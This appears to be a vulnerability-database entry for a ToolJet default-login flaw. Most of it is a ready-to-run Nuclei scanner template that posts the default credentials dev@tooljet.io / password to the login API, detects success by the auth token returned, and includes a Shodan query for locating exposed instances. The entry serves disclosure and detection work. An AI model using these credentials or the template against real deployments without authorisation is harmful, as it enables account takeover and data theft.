漏洞描述
ToolJet contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
tooljet-default-login: ToolJet - Default Login
PoC代码[已公开]
id: tooljet-default-login
info:
name: ToolJet - Default Login
author: random-robbie
severity: high
description: |
ToolJet contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://docs.tooljet.com/docs/contributing-guide/setup/docker/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
cpe: cpe:2.3:a:tooljet:tooljet:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: title:"tooljet"
product: tooljet
vendor: tooljet
tags: default-login,tooljet,vuln
http:
- raw:
- |
POST /api/authenticate HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"email":"{{username}}","password":"{{password}}"}
attack: pitchfork
payloads:
username:
- dev@tooljet.io
password:
- password
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"auth_token":'
- '"organization_id":'
condition: and
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 201
# digest: 4a0a00473045022100b24b383d96271b1ce7ef2318b72093950aa1233a4ee49d6f86e2e4f20c981d7402202847c4fc9ceedf4d79d3acad372af9b78e14f70ab42dfb956de8041941e69c11:922c64590222798bb761d5b6d8e72950